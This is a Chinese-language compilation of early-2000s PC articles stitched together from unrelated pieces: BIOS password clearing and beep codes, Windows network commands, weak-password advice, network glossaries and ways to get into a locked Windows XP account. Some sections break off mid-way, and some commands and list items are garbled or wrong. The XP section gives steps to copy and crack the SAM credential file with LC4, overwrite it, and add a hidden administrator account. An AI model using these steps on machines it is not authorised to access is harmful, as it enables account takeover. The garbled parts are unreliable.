    当“BIOS设置”和“操作系统”均无法进入时，便不能切换到DOS方式用程序来破解密码。此时，只有采用放电法。放电法有两种：一种是“跳线放电法”??拆开主机箱，在主板上找到一个与COMS有关的跳线（参考主板说明书），此跳线平时插在1-2的针脚上，只要将它插在2-3的针脚上，然后再放回1-2针脚即可清除密码。另一种是“COMS电池放电法”?? 拆开主机箱，在主板上找到一粒钮扣式的电池，叫CMOS电池（用于BIOS的单独供电，保证BIOS的设置不因计算机的断电而丢失），取出COMS电池，等待5分钟后放回电池，密码即可解除。但此时BIOS的密码不论如何设置，用万能密码均可进入BIOS设置和操作系统。当然，自己设置的密码同样可以使用。 BIOS中的其他设置将恢复到原来状态，要优化计算机性能或解决硬件冲突需要重新设置。

    （3）万能密码：

    生产较早的某些主板，厂家设有万能密码（参考主板说明书），如：以6个“*”作为万能密码。这种主板，BIOS的密码不论如何设置，用万能密码均可进入BIOS设置和操作系统。当然，自己设置的密码同样可以使用。

三、BIOS响铃含义

下面就较常见的三种BIOS（AMI BIOS、Award BIOS和Phoenix BIOS）的电脑为例，介绍开机自检响铃代码的具体含义（关于电脑使用的BIOS型号可从BIOS芯片上或者从开机自检的信息中看到，如看到AMI的字样则为AMI BIOS；如看到Award字样则为Award BIOS）。
Award BIOS
    1短：系统正常启动。恭喜，你的机器没有任何问题。
    2短：常规错误，请进入CMOS Setup，重新设置不正确的选项。
    1长1短：RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。
    1长2短：显示器或显示卡错误。
    1长3短：键盘控制器错误。检查主板。
    1长9短：主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。
    不断地响（长声）：内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。
    不停地响：电源、显示器未和显示卡连接好。检查一下所有的插头。
    重复短响：电源有问题。
    无声音无显示：电源有问题。
AMI BIOS
    1短：内存刷新失败。更换内存条。
    2短：内存ECC较验错误。在CMOS Setup中将内存关于ECC校验的选项设为Disabled就可以解决，不过最根本的解决办法还是更换一条内存。
    3短：系统基本内存（第1个64kB）检查失败。换内存。
    4短：系统时钟出错。
    5短：中央处理器（CPU）错误。
    6短：键盘控制器错误。
    7短：系统实模式错误，不能切换到保护模式。
    8短：显示内存错误。显示内存有问题，更换显卡试试。
    9短：ROM BIOS检验和错误。
    1长3短：内存错误。内存损坏，更换即可。
    1长8短：显示测试错误。显示器数据线没插好或显示卡没插牢。
Phoenix BIOS
   1短：系统启动正常
   1短1短1短：系统加点初始化失败
   1短1短2短：主板错误
   1短1短3短：CMOS或电池失效
   1短1短4短：ROM BIOS校验错误
   1短2短1短：系统时钟错误
   1短2短2短：DMA初始化失败
   1短2短3短：DMA页寄存器错误
   1短3短1短：RAM刷新错误
   1短3短2短：基本内存错误
   1短3短3短：基本内存错误
   1短4短1短：基本内存地址线错误
   1短4短2短：基本内存校验错误
   1短4短3短：EKSA 时序器错误
   1短4短4短：ELSA NMI错误
   2短1短1短：前64KB 基本内存错误
   3短1短1短：从DMA寄存器错误
   3短1短2短：主DMA寄存器错误
   3短1短3短：主中断处理寄存器错误
   3短1短4短：从中断处理寄存器错误
   3短2短4短：键盘控制器错误
   3短3短4短：显示内存错误
   3短4短2短：显示错误
   3短4短3短：未发现显示只读存储器
   4短2短1短：时钟错误
   4短2短2短：关机错误
   4短2短3短：A20门错误
   4短2短4短：保护模式中断错误
   4短3短1短：内存错误
   4短3短3短：时钟2错误
   4短3短4短：时钟错误
   4短4短1短：串行口错误
   4短4短2短：并行口错误
   4短4短3短：数字协处理器错误


网管人员必备的常用命令(1)

《一键清理系统垃圾》

网管人员必备的常用命令(1)

如果你玩过路由器的话，就知道路由器里面那些很好玩的命令缩写。
例如，"sh int" 的意思是 "show interface"。

现在 Windows 2000 也有了类似界面的工具，叫做 netsh。

我们在 Windows 2000 的 cmd shell 下，输入 netsh
就出来：netsh> 提示符，
输入 int ip 就显示：
interface ip>
然后输入 dump ，我们就可以看到当前系统的网络配置：

&#35; ----------------------------------
&#35; Interface IP Configuration
&#35; ----------------------------------
pushd interface ip

&#35; Interface IP Configuration for "Local Area Connection"

set address name = "Local Area Connection" source = static addr = 192.168.1.168
mask = 255.255.255.0
add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0
set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1
set dns name = "Local Area Connection" source = static addr = 202.96.209.5
set wins name = "Local Area Connection" source = static addr = none

popd
&#35; End of interface IP configuration

上面介绍的是通过交互方式操作的一种办法。
我们可以直接输入命令：
"netsh interface ip add address "Local Area Connection" 10.0.0.2
255.0.0.0"
来添加 IP 地址。

如果不知道语法，不要紧的哦！
在提示符下，输入 ? 就可以找到答案了。方便不方便啊？
原来微软的东西里面，也有那么一些让人喜欢的玩意儿。可惜，之至者甚少啊！

Windows网络命令行程序
这部分包括：

使用 ipconfig /all 查看配置
使用 ipconfig /renew 刷新配置
使用 ipconfig 管理 DNS 和 DHCP 类别 ID
使用 Ping 测试连接
使用 Arp 解决硬件地址问题
使用 nbtstat 解决 NetBIOS 名称问题
使用 netstat 显示连接统计
使用 tracert 跟踪网络连接
使用 pathping 测试路由器
使用 ipconfig /all 查看配置
发现和解决 TCP/IP 网络问题时，先检查出现问题的计算机上的 TCP/IP 配置。可以
使用 ipconfig 命令获得主机配置信息，包括 IP 地址、子网掩码和默认网关。

注意

对于 Windows 95 和 Windows 98 的客户机，请使用 winipcfg 命令而不是 ipconfi
g 命令。
使用带 /all 选项的 ipconfig 命令时，将给出所有接口的详细配置报告，包括任何
已配置的串行端口。使用 ipconfig /all，可以将命令输出重定向到某个文件，并将
输出粘贴到其他文档中。也可以用该输出确认网络上每台计算机的 TCP/IP 配置，或
者进一步调查 TCP/IP 网络问题。

例如，如果计算机配置的 IP 地址与现有的 IP 地址重复，则子网掩码显示为 0.0.0
.0。

下面的范例是 ipconfig /all 命令输出，该计算机配置成使用 DHCP 服务器动态配置
TCP/IP，并使用 WINS 和 DNS 服务器解析名称。

Windows 2000 IP Configuration

Node Type.. . . . . . . . : Hybrid
IP Routing Enabled.. . . . : No
WINS Proxy Enabled.. . . . : No

Ethernet adapter Local Area Connection:

Host Name.. . . . . . . . : corp1.microsoft.com
DNS Servers . . . . . . . : 10.1.0.200
Description. . . . . . . : 3Com 3C90x Ethernet Adapter
Physical Address. . . . . : 00-60-08-3E-46-07
DHCP Enabled.. . . . . . . : Yes
Autoconfiguration Enabled.: Yes
IP Address. . . . . . . . . : 192.168.0.112
Subnet Mask. . . . . . . . : 255.255.0.0
Default Gateway. . . . . . : 192.168.0.1
DHCP Server. . . . . . . . : 10.1.0.50
Primary WINS Server. . . . : 10.1.0.101
Secondary WINS Server. . . : 10.1.0.102
Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM
Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM

如果 TCP/IP 配置没有问题，下一步测试能够连接到 TCP/IP 网络上的其他主机。

使用 ipconfig /renew 刷新配置
解决 TCP/IP 网络问题时，先检查遇到问题的计算机上的 TCP/IP 配置。如果计算机
启用 DHCP 并使用 DHCP 服务器获得配置，请使用 ipconfig /renew 命令开始刷新租
约。

使用 ipconfig /renew 时，使用 DHCP 的计算机上的所有网卡（除了那些手动配置的
适配器）都尽量连接到 DHCP 服务器，更新现有配置或者获得新配置。

也可以使用带 /release 选项的 ipconfig 命令立即释放主机的当前 DHCP 配置。有
关 DHCP 和租用过程的详细信息，请参阅客户机如何获得配置。

注意

对于启用 DHCP 的 Windows 95 和 Windows 98 客户，请使用 winipcfg 命令的 rel
ease 和 renew 选项，而不是 ipconfig /release 和 ipconfig /renew 命令，手动
释放或更新客户的 IP 配置租约。
使用 ipconfig 管理 DNS 和 DHCP 类别 ID
也可以使用 ipconfig 命令：

显示或重置 DNS 缓存。
详细信息，请参阅使用 ipconfig 查看或重置客户解析程序缓存。

刷新已注册的 DNS 名称。
详细信息，请参阅使用 ipconfig 更新 DNS 客户注册。

显示适配器的 DHCP 类别 ID。
详细信息，请参阅显示客户机上的 DHCP 类别 ID 信息。

设置适配器的 DHCP 类别 ID。
详细信息，请参阅设置客户机上的 DHCP 类别 ID 信息。

使用 Ping 测试连接
Ping 命令有助于验证 IP 级的连通性。发现和解决问题时，可以使用 Ping 向目标主
机名或 IP 地址发送 ICMP 回应请求。需要验证主机能否连接到 TCP/IP 网络和网络
资源时，请使用 Ping。也可以使用 Ping 隔离网络硬件问题和不兼容配置。

通常最好先用 Ping 命令验证本地计算机和网络主机之间的路由是否存在，以及要连
接的网络主机的 IP 地址。Ping 目标主机的 IP 地址看它是否响应，如下：

ping IP_address

使用 Ping 时应该执行以下步骤：

Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。
ping 127.0.0.1

Ping 本地计算机的 IP 地址验证是否正确地添加到网络。
ping IP_address_of_local_host

Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通
讯。
ping IP_address_of_default_gateway

Ping 远程主机的 IP 地址验证能否通过路由器通讯。
ping IP_address_of_remote_host

Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址，所以如果
用地址成功，但是用名称 Ping 失败，则问题出在地址或名称解析上，而不是网络连
通性的问题。详细信息，请参阅使用 Arp 解决硬件地址问题。

如果在任何点上都无法成功地使用 Ping，请确认：

安装和配置 TCP/IP 之后重新启动计算机。
“Internet 协议 (TCP/IP) 属性”对话框“常规”选项卡上的本地计算机的 IP 地址
有效而且正确。
启用 IP 路由，并且路由器之间的链路是可用的。
您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、
是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置“不分段”标志。可
以键入 ping -? 查看这些选项。

下例说明如何向 IP 地址 172.16.48.10 发送两个 Ping，每个都是 1,450 字节：

C:>ping -n 2 -l 1450 172.16.48.10
Pinging 172.16.48.10 with 1450 bytes of data:

Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32
Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32

Ping statistics for 157.59.8.1:
Packets:Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate roundtrip times in milli-seconds:
Minimum = 0ms, Maximum = 10ms, Average = 2ms
默认情况下，在显示“请求超时”之前，Ping 等待 1,000 毫秒（1 秒）的时间让每个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路，如卫星链路，则响应可能会花更长的时间才能返回。可以使用 -w （等待）选项指定更长时间的超时。

使用 Arp 解决硬件地址问题
“地址解析协议 (ARP)”允许主机查找同一物理网络上的主机的媒体访问控制地址，如果给出后者的 IP 地址。为使 ARP 更加有效，每个计算机缓存 IP 到媒体访问控制地址映射消除重复的 ARP 广播请求。

可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓存和解决地址解析问题非常有用。

详细信息，请参阅查看“地址解析协议 (ARP)”缓存和添加静态 ARP 缓存项目。

使用 nbtstat 解决 NetBIOS 名称问题
TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBIOS 名称解析提供了很多选项，包括本地缓存搜索、WINS 服务器查询、广播、DNS 服务器查询以及 Lmhosts 和主机文件搜索。

Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用nbtstat 命令删除或更正预加载的项目：

nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。
nbtstat -c 显示 NetBIOS 名称缓存，包含其他计算机的名称对地址映射。
nbtstat -R 清除名称缓存，然后从 Lmhosts 文件重新加载。
nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称，然后刷新它们的注册。
nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态命令将返回计算机的本地 NetBIOS 名称表，以及适配器的媒体访问控制地址。
nbtstat -S 列出当前的 NetBIOS 会话及其状态（包括统计），如下例所示：
NetBIOS connection table

Local name State In/out Remote Host Input Output
------------------------------------------------------------------
CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB
CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB
CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB
CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB
CORP1 <03> Listening
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接，而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示Ethernet 统计信息，而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n，则不能将地址和端口号转换成名称。下面是 netstat 的输出示例：

C:>netstat -e
Interface Statistics

Received Sent
Bytes 3995837940 47224622
Unicast packets 120099 131015
Non-unicast packets 7579544 3823
Discards 0 0
Errors 0 0
Unknown protocols 363054211

C:>netstat -a

Active Connections

Proto Local Address Foreign Address State
TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED
TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED
TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED
TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED
TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED
TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED
UDP CORP1:1025 *:*
UDP CORP1:snmp *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*
UDP CORP1:nbname *:*
UDP CORP1:nbdatagram *:*

C:>netstat -s
IP Statistics

Packets Received = 5378528
Received Header Errors = 738854
Received Address Errors = 23150
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 0
Received Packets Delivered = 4616524
Output Requests = 132702
Routing Discards = 157
Discarded Output Packets = 0
Output Packet No Route = 0
Reassembly Required = 0
Reassembly Successful = 0
Reassembly Failures =
Datagrams Successfully Fragmented = 0
Datagrams Failing Fragmentation = 0
Fragments Created = 0

ICMP Statistics
Received Sent
Messages 693 4
Errors 0 0
Destination Unreachable 685 0
Time Exceeded 0 0
Parameter Problems 0 0
Source Quenches 0 0
Redirects 0 0
Echoes 4 0
Echo Replies 0 4
Timestamps 0 0
Timestamp Replies 0 0
Address Masks 0 0
Address Mask Replies 0 0

TCP Statistics

Active Opens = 597
Passive Opens = 135
Failed Connection Attempts = 107
Reset Connections = 91
Current Connections = 8
Segments Received = 106770
Segments Sent = 118431
Segments Retransmitted = 461

UDP Statistics

Datagrams Received = 4157136
No Ports = 351928
Receive Errors = 2
Datagrams Sent = 13809

使用 tracert 跟踪网络连接
Tracert（跟踪路由）是路由跟踪实用程序，用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。

Tracert 工作原理
通过向目标发送不同 IP 生存时间 (TTL) 值的“Internet 控制消息协议 (ICMP)”回应数据包，Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时，路由器应该将“ICMP 已超时”的消息发回源系统。

Tracert 先发送 TTL 为 1 的回应数据包，并在随后的每次发送过程将 TTL 递增 1，直到目标响应或 TTL 达到最大值，从而确定路由。通过检查中间路由器发回的“ICMP 已超时”的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包，这在Tracert 实用程序中看不到。

Tracert 命令按顺序打印出返回“ICMP 已超时”消息的路径中的近端路由器接口列表。如果使用 -d 选项，则 Tracert 实用程序不在每个 IP 地址上查询 DNS。

在下例中，数据包必须通过两个路由器（10.0.0.1 和 192.168.0.1）才能到达主机
172.16.0.99。主机的默认网关是 10.0.0.1，192.168.0.0 网络上的路由器的 IP 地
址是 192.168.0.1。

C:>tracert 172.16.0.99 -d


网络安全得注意 十类密码不能用

《一键清理系统垃圾》

网络安全得注意 十类密码不能用

   在信息技术普遍应用的时代，密码已经成为验证身份的主要手段，但有些密码千万不能使用。
1、密码和用户名相同。如：用户名和密码都是123456789。几乎所有盗取密码的人，都会以用户名作为破解密码的突破口。
2、密码为用户名中的某几个邻近的数字或字母。如：用户名为test000001，密码为test或000001。如果您的用户名是字母和数字组合，如：test000001，那么别人要盗取您的密码时，肯定会以用户名中的字母或数字来试密码。
3、密码为连续或相同的数字。如123456789、1111111等。几乎所有黑客软件，都会从连续或相同的数字开始试密码。如：先试111、111......到9999999999，然后再试123、321、234、1234......如果您的密码是111111、123456或654321，甚至用不着黑客软件也能在片刻试出。
4、密码为连续或相同的数字，如abcdefg、jjjjjjj等。字母虽然比数字多，但是先试相同的字母如aaaaa，再试连续的字母如abcde，黑客软件所用时间也不会太多。
5、将用户名颠倒或加前后缀作为密码。如用户名为test，密码为test123、aaatest、tset等。以用户名test为例，黑客软件在尝试使用test作为密码之后，还会试着使用诸如test123、test1、tset、tset123等作为密码，只要是你想得到的变换方法，黑客软件也会想得到，它破解这种口令，几乎不需要时间。
6、使用姓氏的拼音作为密码。在不少黑客软件中，百家姓往往都被一一列出，并放在字典的前列。只需片刻即可破解您的密码。以姓氏或姓名的拼音作为密码还存在一种危险：想盗您密码的人如果探听到您的真实姓名，就很有可能用您姓名中的拼音组合来试密码。
7、使用自己或亲友的生日作为密码。由于表示月份的只有1～12可以使用，表示日期的也只有1－31可以使用，表示日期的肯定19xx或xx，因此表达方式只有100×12×31×2＝74400种，即使考虑到年月日共有六种排列顺序，一共也只有74400×6＝446400种。按普通计算机每秒搜索3～4万种的速度计算，破解您的密码最多只需10秒。
8、使用常用英文单词作为密码。黑客软件一般都有一个包含10万～20万个英文单词及相应组合的字典库。如果您的密码在这个库中，那么即使字典库中有20万单词，再考虑到一些DES（数据加密算法）的加密运算，每秒搜索1800个，也只需要110秒。
9、使用8位以下的数字作为密码。数字只有10个，8位数字组成方式只有10的8次方＝100，000，000种，按普通计算机每秒搜索3～4万种的速度计算，黑客软件只需要不到3小时就可以破解您的密码了。
10、使用5位以下的小写字母加数字作为口令。小写字母加数字一共36位，组合方式只有36的5次方＝60466176种可能性，按普通的计算机每秒搜索3～4万种的速度计算，黑客软件只需要25分钟就可以破解密码。


网络安全小知识两则

《一键清理系统垃圾》

网络安全小知识两则

   怎样才能设置安全的口令？
   答：黑客经常使用非常原始的策略来猜测安全口令。这就是说，他们要从一位口令开始，不断循环，逐个测试两位、三位等等每一个可能的字符组合。通过这样的方法，他们最终能够测试出任何口令。但是，你的口令位数越多，使用字符组合越奇怪（例如特种字符“＠％＄”等，或者字母和数字的组合），要解开这个口令耗费的时间也就越多。经常变换口令也有助于提高安全特性。

   怎样才能保护我的系统不受恶意程序代码的攻击？
   答：为了保护你的计算机不受病毒和蠕虫的攻击，你必须始终处于戒备状态。诺顿网络安全特警2001包含了诺顿防病毒2001软件的完全版本，有了它，就可以让你在每次上网时都能够对系统提供最广泛、最有力的保护。


网络基本术语

《一键清理系统垃圾》

网络基本术语

   TCP／IP协议：世界上有各种不同类型的计算机，也有不同的操作系统，要想让这些装有不同操作系统的不同类型计算机互相通讯，就必须有统一的标准。TCP／IP协议就是目前被各方面遵从的网际互联工业标准。
   Java：由Sun公司开发的新一代面向对象的网络编程语言，可以交叉支持不同的技术平台。
   JavaScript：这是一种新的描述语言，该语言可以被嵌入HTML文件中。通过JavaScript，当访问者输入信息时，信息不用经过传给服务器处理之后，再传回来的过程，而是直接可以被客户端的应用程序处理。
   ISP：全称为Internet Service Provider，即因特网服务提供商，能提供拨号上网服务、网上浏览、下载文件、收发电子邮件等服务。
   ICP：网上信息内容服务商，它为上网用户提供包括新闻、娱乐、购物等方面的信息。


网络名词解释

《一键清理系统垃圾》

网络名词解释

GB 国标码，中文内码之一，此码代表中文简体字，为中国大陆广泛使用。
Big5 大五码，中文内码之一，此码代表中文繁体字，为港、台地区广泛使用。
browser 浏览器，一种可在Internet上任何地方查找和访问文件的程序，如网景公司（Netscape）所推出的 Netscape Navigator 或微软公司（Microsoft）的 Microsoft Explorer。
CGI 通用网关接口（Common Gateway Interface），通用网关接口，是Web 服务器与外部应用程序之间的一个接口标准。
Domain 域，称为网路区域，每区有独立的运行方式。
E-mail 电子邮件，是计算机应用软件的通用术语，可使用户在不同的计算机上发送信息，电子邮件是网络上最常用的通信方式。
Firewall 防火墙，用来分割网域、过滤传送和接收资料、及防制非法入侵。
Gateway 网关，资料传输在不同的网段相接的接口。
Homepage 主页，在任何超文本系统中，作为进入Web有关文档的初始入口点的文档。
HTML 超文本标示语言，此语言专用在全球互联网上，为资讯网上标准格式化的一种，需用浏览器来观看。
http 超文本传送方式，此为网页常用的传送方式之一。
hypertext 超文本，此文件规格含有超文本处理语言，可以通过链接至其它地方，用於网页上。
hyperlink 超链，此为连接另一些网页的入囗，含有此连接点的文字通常以蓝字底线显示。
IP Address 网路协定位址，又称网路地址，此地址在全球网路上独一无二，不可重复。
Java 爪哇语言，Java是SUN公司的编程语言，用于编制面向网络的小应用程序（Applet），可使网页有动画的效果及运算的能力。
Perl 语言，目前在写CGI程序中最流行的一种语言，大部份用来写给通用网关接口处理一些网页传送。
Search Engine 查询器，又叫搜索引擎，用来找寻资料。种类有包括分类、区域、及全球性，如Yahoo、Infoseek、Lycos等。
server 服务器，此为资料或程序库，专门提供信息给网络访问者们使用。
URL 网页定位点，网页在全球互联网上独一无二的定位点。
VRML 虚拟实境模拟语言，全英文名为Virtual Reality Modeling Language，一种在Inet上颇为流行的语言，此语言可使网页产生虚拟现实（Virtual Reality）的立体动画效果。
webmaster 网页管理者，管理该网页资料的相关人员。
web page 网页，在浏览器上所看到的资料。
web site 网点，网页站点，在全球网（WWW）中网页所存放的地方。
web title 网页标题，网页的名称，通常显示在浏览器最上部的标题栏上。
WWW 世界范围网 World Wide Web 全世界性的互联网的多媒体子网，是Internet上发展最快的部分，需用浏览器查阅。


首先提议：

《一键清理系统垃圾》

首先提议：

    如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。

    从“控制面板”中找到“用户账户”项，选中自己的账户进入如图所示的控制界面，我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”，点击后便可打开“忘记密码向导”，向导会提示插入一张格式化过的空白磁盘，操作过程中会让你输入该账户所使用的密码，很快便可以创建一张密码重设盘。

    以后，当我们忘记了账户密码的时候，在没有使用“欢迎屏幕”登录方式的情况下登录到Windows XP后，按下“Ctrl + Alt + Del”组合键，出现“Windows 安全”窗口，点击选项中“更改密码”按钮，出现更改密码窗口。这个窗口中，将当前用户的密码备份，点击左下角“备份”按钮，激活“忘记密码向导”，按照提示创建密码重设盘。

    如果在Windows XP的登录窗口输入了错误的密码，就会弹出“登录失败”窗口，如果你的确想不起来自己的密码是什么时，可点击“重设”按钮，启动密码重设向导，通过刚才所创建的密码重设盘，就可以用这张密码重设盘更改密码并启动系统。重新设定密码，登录Windows XP。

  “密码重设盘”的创建，含有一定的危险性，因为任何人都可以使用这一张“密码重设盘”来登录Windows XP，都可以以该用户的名义进入用户帐户，操作真正用户所能操作的一切，所以必须将“密码重设盘”保存在适当的地方，以防丢失或失泄密。

---------------------------------------

方法1——利用“administrator”（此方法适用于管理员用户名不是“administrator”的情况）

    我们知道在安装Windows XP过程中，首先是以“administrator”默认登录，然后会要求创建一个新账户，以进入Windows XP时使用此新建账户登录，而且在Windows XP的登录界面中也只会出现创建的这个用户账号，不会出现“administrator”，但实际上该“administrator”账号还是存在的，并且密码为空。

    当我们了解了这一点以后，假如忘记了登录密码的话，在登录界面上，按住Ctrl+Alt键，再按住Del键二次，即可出现经典的登录画面，此时在用户名处键入“administrator”，密码为空进入，然后再修改“zhangbp”的口令即可。

---------------------------------------------

方法2——删除SAM文件（注意，此法只适用于WIN2000）

    Windows NT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器（Security Account Manager , SAM）的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识完全不同。因此，一旦某个帐号被用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。安全帐号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名以及口令等相关信息都会保存在这个文件中。

    知道了这些，我们的解决办法也产生了：删除SAM文件，启动系统，它会重建一个干净清白的SAM，里面自然没有密码了。

    不过，这么简单的方法在XP是不适用的，可能微软以此为BUG，做了限制……所以现在在XP系统下，即使你删除了SAM，还是不能删除密码，反而会使系统启动初始化出错，从而进入死循环而不能进系统！！
---------------------------------------------

方法3——从SAM文件中找密码（前提……会使用DOS基本命令就行）

    在系统启动前，插入启动盘，进入：C:\WINNT\System3\Config\ 用COPY命令将SAM文件复制到软盘上。拿到另一台机子读取。这里需要的工具是LC4，运行LC4，打开并新建一个任务，然后依次击“IMPORT→Import from SAM file”，打开已待破解的SAM文件，此时LC4会自动分析此文件，并显示出文件中的用户名；之后点击“Session→Begin Audit”，即可开始破解密码。如果密码不是很复杂的话，很短的时间内就会得到结果。

    不过，如果密码比较复杂的话，需要时间会很长，这时我们就需要用下面的方法了。:(
---------------------------------------------

方法4——用其他SAM文件覆盖（前提是你可以得到另外一台电脑的SAM文件和它的密码……个人觉得是最为可行的办法）

1——如上所说，SAM文件保存着登录名以及口令，那么我们只要替换SAM文件就是替换登录名以及口令了。不过，这个替换用的SAM文件的“产地”硬盘分区格式要和你的系统一样（看是FAT32还是NTFS，你自己确认）。最好这个“产地”的系统没有设密码，安全方面设置没动过（实际上很大部分的个人电脑都是这样），当然，比较保险的方式是把XP的[Win NT\System 32\Config\]下的所有文件覆盖到[C：\Win NT\System 32\Config\]目录中（假设你的XP安装在默认分区C：），

2——如果得不到别人的帮助（我是说“万一”），你可以在别的分区上在安装一个XP系统，硬盘分区格式要和原来的一样，并且请你注意一定不要和原来的XP安装在同一分区！在开始之前，一定要事先备份引导区MBR，备份MBR的方法有很多，使用工具软件，如杀毒软件KV3000等。装完后用Administrator登陆，现在你对原来的XP就有绝对的写权限了，你可以把原来的SAM考下来，用10PHTCRACK得到原来的密码。也可以把新安装的XP的Win NT\System 32\Config\下的所有文件覆盖到C：\Win NT\System 32\Config\目录中（架设原来的XP安装在这里），然后用KV3000恢复以前悲愤的主引导区MBR，现在你就可以用Administrator身份登陆XP了。

[2号方案我自己都觉得麻烦，还是1号：叫别人帮忙比较好……]
【另外，据说C:\windows\repair 目录下的SAM是原始版本的，可以用它来覆盖 system32下的这个 SAM，这样就可以删除现在的密码，而恢复到刚开始安装系统时的密码了。如果这个密码为空，岂不是…… 】
---------------------------------------------

方法5——使用Win 2000安装光盘引导修复系统（前提……很明显吧？就是你要有一张Win 2000安装光盘）

    使用Win 2000安装光盘启动电脑，在Wndows2000安装选择界面选择修复Windows 2000（按R键）；，然后选择使用故障控制台修复（按C键），系统会扫描现有的Window2000／XP版本。一般只有一个操作系统，所以只列出了一个登录选择（l：C：＼Windows）。从键盘上按l，然后回车，这个时候，Window XP并没有要求输人管理员密码，而是直接登录进入了故障恢复控制台模式（如果使用的是Windows XP安装光盘启动的，那是要求输人管理员密码的。这里指的管理员是指系统内建的Administraor账户）熟悉Windows的朋友都知道，故障恢复控制台里面可以进行任何系统级别的操作，例如：复制、移动、删除文件，启动、停止服务，甚至格式化、重新分区等破坏性操作。

    测试使用光盘：集成SP3的Windows 2000 Proessional 简体中文版。
    测试通过的系统：Windows XP Proessional，打SPI补丁的Windows XP （FAT32和NTFS文件系统都一样）

[需要注意的是，由于各种原因，市面上的一些Windows 2000安装光盘不能够显现故障控制台登录选项，所以也无法利用这个漏洞。同时，由于故障控制台模式本身的限制，也无法从网络上利用这个漏洞，换句话说，这个漏洞仅限于单机。]
---------------------------------------------

方法6——利用NET命令（有两个必要前提才行：按装WINDOWS XP的分区必须采用FAT 32文件小系统，用户名中没有汉字。）

    我们知道在Windows XP中提供了“net user”命令，该命令可以添加、修改用户账户信息，其语法格式为：
    net user [UserName [Password | *] [options]] [/domain]

    net user [UserName {Password | *} /add [options] [/domain]

    net user [UserName [/delete] [/domain]]

    每个参数的具体含义在Windows XP帮助中已做了详细的说明，在此笔者就不多阐述了。好了，我们现在以恢复本地用户“zhangbq”口令为例，来说明解决忘记登录密码的步骤：

    1、重新启动计算机，在启动画面出现后马上按下F8键，选择“带命令行的安全模式”。

    2、运行过程结束时，系统列出了系统超级用户“administrator”和本地用户“zhangbq”的选择菜单，鼠标单击“administrator”，进入命令行模式。

    3、键入命令：“net user zhangbq 123456 /add”，强制将“zhangbq”用户的口令更改为“123456”。若想在此添加一新用户（如：用户名为abcdef，口令为123456）的话，请键入“net user abcdef 123456 /add”，添加后可用“net localgroup administrators abcdef /add”命令将用户提升为系统管理组“administrators”的用户，并使其具有超级权限。

    4、重新启动计算机，选择正常模式下运行，就可以用更改后的口令“123456”登录“zhangbq”用户了。另外，zhangbq 进入 登入後在〔控制台〕→〔使用者帐户〕→选忘记密码的用户，然後选〔移除密码〕後〔等出〕 在登入画面中选原来的用户便可不需密码情况下等入 (因已移除了) 删除刚才新增的用户，在〔控制台〕→〔使用者帐户〕→选〔alanhkg888〕，然後选〔移除帐户〕便可

[但是有人提出：在实验后得知——在安全模式命令符下新建的用户不能进入正常模式（此结论暂不确认）]


微机故障处理的一般性原则和方法

《一键清理系统垃圾》

微机故障处理的一般性原则和方法

